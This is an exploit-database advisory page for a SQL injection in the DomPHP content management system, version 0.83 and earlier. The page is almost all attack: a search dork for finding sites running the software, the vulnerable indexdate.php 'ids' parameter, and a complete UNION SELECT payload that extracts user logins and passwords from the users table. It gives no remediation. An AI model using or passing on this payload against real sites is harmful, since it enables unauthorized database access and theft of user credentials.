DomPHP 0.83 SQL Injection

2014.01.16
Credit: Houssamix
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

------------------------------------------------------------- DomPHP <= v0.83 SQL Injection Vulnerability ------------------------------------------------------------- = Author : Houssamix = Script : DomPHP <= v0.83 = Download : http://www.domphp.com/download/ = BUG : SQL Injection Vulnerability = DORK : Site cr ? l'aide du CMS DomPHP v0.83 = Exploit : http://[target]/agenda/indexdate.php?ids=77 [SQL] Exemple : http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--

References:

http://cxsecurity.com/issue/WLB-2014010074


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top